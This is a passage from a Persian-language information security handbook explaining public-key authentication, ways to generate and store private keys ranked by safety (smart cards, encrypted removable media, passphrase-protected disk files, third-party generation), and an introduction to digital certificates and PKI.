ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﺩﺍﺩﺓ ﻣﺒﺎﺣﺜﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ ﺍﺭﺳﺎﻝ ﻣﻲﻧﻤﺎﻳﺪ ،ﻛـﻪ ﺑـﺎ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﻭ ﺑـﺎﺯﭘﺲ ﻓﺮﺳـﺘﺎﺩﻥ ﺁﻥ ﺑـﺼﻮﺭﺕ
ﺭﻣﺰﺷﺪﻩ ﺑﺎ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻮﻳﺖ ﺍﻭ ﺭﺍ ﺑﻪ ﺍﺛﺒﺎﺕ ﻣﻲﺭﺳـﺎﻧﺪ .ﺑـﺪﻟﻴﻞ ﭘﺮﻭﺗﻜـﻞ ﻣﺒﺎﺣﺜـﻪ -ﭘﺎﺳـﺦ ،ﺑﻄـﻮﺭ ﻛﻠـﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ
onlineﻧﺴﺒﺖ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ offlineﺍﺯ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ.
٣١٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
.٢
ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ .ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﺩﻳﮕﺮﺍﻥ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ،ﺩﺯﺩﻱ ،ﻭ
ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﺑﻪ ﻳﻚ ﻣﻜﺎﻧﻴﺰﻡ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺎﺯ ﺍﺳﺖ ،ﻛﻪ ﺷﺨﺼﻲ ﻛﻪ ﻫﻮﻳﺖ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﺪ ﺑﺘﻮﺍﻧﺪ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ ﻛﻪ ﻧﺎﻡ ﺭﻭﻱ ﻛﻠﻴﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﻧﺎﻡ
ﺻﺤﻴﺢ ﺻﺎﺣﺐ ﻓﻌﻠﻲ ﺁﻥ ﻛﻠﻴﺪ ﺍﺳﺖ.
.٣
ﺍﮔﺮ ﻛﻠﻴﺪﻫﺎ ﺑﺪﻭﻥ ﺩﻗﺖ ﺍﻳﺠﺎﺩ ﺷﻮﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﺘﻨﺎﻇﺮ ﻣﺤﺎﺳـﺒﻪ ﻛﻨـﺪ .ﭼﻨﺎﻧﭽـﻪ
ﻛﻠﻴﺪﻫﺎ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﺫﺧﻴﺮﻩ ﻧﺸﻮﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﺯﺩﺩ.
ﻻ
ﻫﺮﭼﻨﺪ ﺩﺭ ﻳﻚ ﻧﮕﺎﻩ ﺳﻄﺤﻲ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺩﻩ ﺑﻨﻈﺮ ﻣﻲﺭﺳﻨﺪ ،ﺍﻣﺎ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺻﺤﻴﺢ ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ .ﺍﺯ ﺍﻳﻦ ﺑﺪﺗﺮ ﺍﻳﻨﻜﻪ ﻣﻌﻤـﻮ ﹰ
ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﺮﺩ ﻭ ﺗﺸﺨﻴﺺ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ ﺍﻣـﻦﺗـﺮ ﻫـﺴﺖ ﻳـﺎ
ﻧﻴﺴﺖ.
ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻭ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪﻫﺎ ﭼﻨﺪ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻳﻦ ﺭﺍﻫﻬﺎ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺘﺮﺗﻴﺐ ﻛﺎﻫﺶ ﺍﻳﻤﻨﻲ ﺍﺯ ﻗﺮﺍﺭ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
.١
ﻳﻚ ﻛﻤﻚﭘﺮﺩﺍﺯﻧﺪﺓ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﺜﻞ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺑﻜـﺎﺭ ﺑﺮﻳـﺪ .ﻳـﻚ ﻛـﺎﺭﺕ ﻫﻮﺷـﻤﻨﺪ ﺳـﺎﺯﮔﺎﺭ ﺑـﺎ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ،ﺩﺍﺭﺍﻱ ﻳـﻚ
ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ،ﻳﻚ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪﺓ ﺍﻋﺪﺍﺩ ﺗﺼﺎﺩﻓﻲ ،ﻭ ﺗﻮﺍﺑﻊ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺍﻭﻟﻴﺔ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳـﺖ ،ﻭ ﻫﻤﭽﻨـﻴﻦ
ﻳﻚ ﺣﺎﻓﻈﻪ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻠﻴﺪﻫﺎ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﺪ .ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﻫﻴﭽﮕـﺎﻩ ﺍﺯ
ﻛﺎﺭﺕ ﺧﺎﺭﺝ ﻧﻤﻲﺷﻮﺩ .ﭼﻨﺎﻧﭽﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺨﺸﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻣﻀﺎ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ،ﺁﻥ ﺑﺨﺶ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳـﺪ ﺑـﻪ ﻛـﺎﺭﺕ
ﻣﻨﺘﻘﻞ ﺷﻮﺩ ،ﻭ ﺳﭙﺲ ﺟﻮﺍﺏ ﺍﻣﻀﺎ ﺷﺪﻩ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﻩ ﺍﺯ ﺭﻭﻱ ﻛﺎﺭﺕ ﻣﻨﺘﻘﻞ ﻣﻲﮔﺮﺩﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﻛﻠﻴـﺪ
ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﮕﺮ ﺁﻧﻜﻪ ﺧﻮﺩﺷﺎﻥ ﻣﺎﻟﻜﻴﺖ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻨﺪ .ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﮐﺪﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ،ﮔﻴﺮﻧـﺪﻩﻫـﺎﻱ
ﺍﺛﺮ ﺍﻧﮕﺸﺖ ،ﻳﺎ ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ ﺗـﺎ ﻛـﺎﺭﺕ ﺗﻨﻬـﺎ ﺩﺭﺻـﻮﺭﺗﻲ
ﺍﻣﻀﺎ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﻛﻪ ﺩﺍﺭﻧﺪﺓ ﻛﺎﺭﺕ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺭﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﻼ ﺷﻜﺴﺖﭘﺬﻳﺮ ﻣـﻲﺑﺎﺷـﻨﺪ .ﺍﮔـﺮ ﻛـﺎﺭﺕ ﮔـﻢ ﺷـﻮﺩ،
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴﺴﺘﻨﺪ ﻭ ﺍﺯ ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﻛﺎﻣ ﹰ
ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ ،ﻭ ﻳﺎ ﺁﺳﻴﺐ ﺑﺒﻴﻨﺪ ،ﻛﻠﻴﺪﻫﺎﻱ ﺭﻭﻱ ﺁﻥ ﺍﺯ ﺑﻴﻦ ﻣﻲﺭﻭﻧﺪ ﻭ ﺩﻳﮕﺮ ﺩﺭ ﺩﺳﺘﺮﺱ ﻛﺎﺭﺑﺮ ﻧﻴﺴﺘﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻭﻱ
ﻛﺎﺭﺗﻬﺎ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ﻧﻮﻋﻲ ﺳﻴﺴﺘﻢ ﻛﭙـﻲ ﻛـﺮﺩﻥ ﺍﺯ
ﺭﻭﻱ ﻛﺎﺭﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ ﺗﺎ ﺍﺯ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻥ ﻛﻠﻴﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﻛﻨـﻴﻢ .ﻫﺮﭼﻨـﺪ ﺍﮔـﺮ ﺍﻳـﻦ ﻛﻠﻴـﺪﻫﺎ ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ ﺍﻣـﻀﺎﻫﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﻧﻴﺴﺖ .ﺍﮔﺮ ﻳﻚ ﻛﻠﻴﺪ ﺍﻣﻀﺎ ﻛﻨﻨﺪﻩ ﮔﻢ ﺷﻮﺩ ،ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻚ ﻛﻠﻴـﺪ ﺍﻣـﻀﺎ ﻛﻨﻨـﺪﻩ ﺟﺪﻳـﺪ
ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ،ﻭ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺯ ﺑﻴﻦ ﻧﻤﻲﺭﻭﺩ .ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺩﺭ ﻣﻘﺎﺑﻞ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦ ﻧﻴﺴﺘﻨﺪ.
ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻛﻮﭼﻜﻲ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ :ﻧﻘﺎﻳﺺ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﺯ
ﻛﻠﻴﺪ ﺷﻮﺩ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﻳﻚ ﻛﺎﺭﺕ ﺭﺍ ﺗﺤﻠﻴﻞ ﻛﺮﺩ ﻭ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻭﻱ ﺁﻧـﺮﺍ ﺑﺎﺯﻳـﺎﺑﻲ ﻧﻤـﻮﺩ .ﺩﺭ ﻫـﺮ ﺻـﻮﺭﺕ
ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻤﻦﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ.
.٢
ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺭﻭﻣﻴﺰﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ Flashﺫﺧﻴﺮﻩ ﻛﻨﻴﺪ .ﺯﻣﺎﻧﻴﻜﻪ
ﻛﻠﻴﺪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ ،ﻛﺎﺭﺑﺮ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﺭﺍ ﻭﺍﺭﺩ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺭﺍﻳﺎﻧﻪ ﻣﻲﻛﻨﺪ ،ﺭﺍﻳﺎﻧﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺩﺭ ﺣﺎﻓﻈﻪ
ﻣﻲﺧﻮﺍﻧﺪ ،ﻛﻠﻴﺪ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ ،ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﺍﺯ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺧﻮﺍﺳﺖﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ .ﺍﻳﻦ ﺗﻜﻨﻴـﻚ
ﻧﺴﺒﺖ ﺑﻪ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺍﺯ ﺍﻳﻤﻨﻲ ﻛﻤﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ،ﭼﻮﻥ ﺩﺭ ﺁﻥ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﻪ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﻣﻨﺘﻘﻞ ﺷـﻮﺩ ،ﺟـﺎﻳﻲ
ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻣﻮﺭﺩ ﺣﻤﻠﺔ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺗﺮﺍﻭﺍﻫﺎ ،ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
.٣
ﻛﻠﻴﺪ ﺭﺍ ﺩﺍﺧﻞ ﺭﺍﻳﺎﻧﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ ١٣٢ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭ ﻳﻚ ﻓﺎﻳـﻞ ﺭﻭﻱ ﺩﻳـﺴﻚ
ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺳﺎﺯﻳﺪ .ﺍﻳﻦ ﺗﻜﻨﻴﻜﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻣﺜـﻞ PGPﻭ Netscape Navigatorﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ
132 Pass Phrase
٣١٩
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﻫﺮﭼﻨﺪ ﺗﮑﻨﻴﮏ ﻣﻨﺎﺳﺒﻲ ﻣﻲﺑﺎﺷﺪ ،ﺍﻣﺎ ﺍﺷﻜﺎﻝ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﺔ
ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ ﺷﻤﺎ ﺭﺍ ﺑﺪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺷﻤﺎ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﭼﻮﻥ ﻛﻠﻴـﺪ ﺑـﺮﺍﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ ،ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺕ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﻳﺎ ﺗﺮﺍﻭﺍﻫﺎ ﺑﻪ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ.
.۴
ﻧﺎﺍﻣﻦﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﺟﻔﺖ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ /ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺮﺍﻱ
ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻭ ﺳﭙﺲ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺍﻭ ﺑﮕﻴﺮﻳﺪ .ﻣﺸﻜﻞ ﺍﺻﻠﻲ ﺍﻳﻦ ﺭﻭﺵ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ،
ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺒﺮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ،ﭼﺮﺍﮐﻪ ﻳﻜﻨﻔﺮ ﺩﻳﮕﺮ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ .ﻋﻠﻴﺮﻏﻢ ﺍﻳـﻦ ﻣـﻮﺭﺩ ،ﺑﻌـﻀﻲ
ﺳﺎﺯﻣﺎﻧﻬﺎ )ﻭ ﺑﻌﻀﻲ ﺩﻭﻟﺘﻬـﺎ( ﺍﻓﺮﺍﺩ ﺭﺍ ﻣﺠﺒﻮﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺗﻬﻴﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﺗـﺎ ﺳـﺎﺯﻣﺎﻥ ﻳـﻚ
ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﻫﻤﺔ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺑـﺮﺍﻱ ﺍﺷـﺨﺎﺹ ﺭﺍ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﻛﻨـﺪ .ﺩﺭ
ﻋﻤﻞ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺯ ﮔﺰﻳﻨﺔ ﺳﻮﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ -ﺳﺎﺧﺘﻦ ﻳﻚ ﻛﻠﻴﺪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺭﻭﻣﻴﺰﻱ ﻭ ﺳـﭙﺲ ﺫﺧﻴـﺮﺓ ﺁﻥ
ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ.
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭ ﻳﻚ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ) ١٣٣(PKIﺗﻼﺷـﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﻭﺻـﻞ ﻛـﺮﺩﻥ ﻫﻮﻳـﺖﻫـﺎ ﺑـﻪ ﺍﻣـﻀﺎﻫﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ .ﮔﻮﺍﻫﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻳﻚ ﻧﻮﻉ ﺧﺎﺹ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ -ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﺘﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻫﻤﺮﺍﻩ ﻳﻚ ﻫﻮﻳﺖ ﺍﺳﺖ
ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﺔ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺗﻔﺴﻴﺮ ﺷﻮﺩ PKI .ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻜﻨﻮﻟﻮﮊﻳﻬﺎ ﻭ ﺧﻂﻣـﺸﻲﻫـﺎ ﺑـﺮﺍﻱ
ﺍﻳﺠﺎﺩ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ .ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﭘﻴﻮﻧﺪ ﻫﻤﺰﻣﺎﻥ ﺳﻪ ﻣﺴﺌﻠﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ :ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴـﺪ
ﻋﻤﻮﻣﻲ ﻛﻪ ﺑﻪ ﺩﻗﺖ ﻧﻮﺷﺘﻪﺷﺪﻩ ،ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﻛﻪ ﺩﻗﻴﻘﹰﺎ ﺍﺟﺮﺍ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﻗـﺎﻧﻮﻧﻲ ﻛـﻪ ﺍﺟـﺮﺍﻱ ﺻـﺤﻴﺢ
ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﺿﻤﺎﻧﺖ ﻛﻨﺪ .ﺩﺭ ﻣﻮﺭﺩ PKIﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤﻴﻦ ﻓﺼﻞ ﺑﻪ ﺗﻔﺼﻴﻞ ﺑﺤﺚ ﺷﺪﻩ ﺍﺳﺖ.
ﻣﺸﻜﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﻣﺸﻜﻞ ﻋﻤﻴﻖ ﻓﻠﺴﻔﻲ ﺍﺳﺖ .ﭼﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻳـﻚ ﻛﻠﻴـﺪ
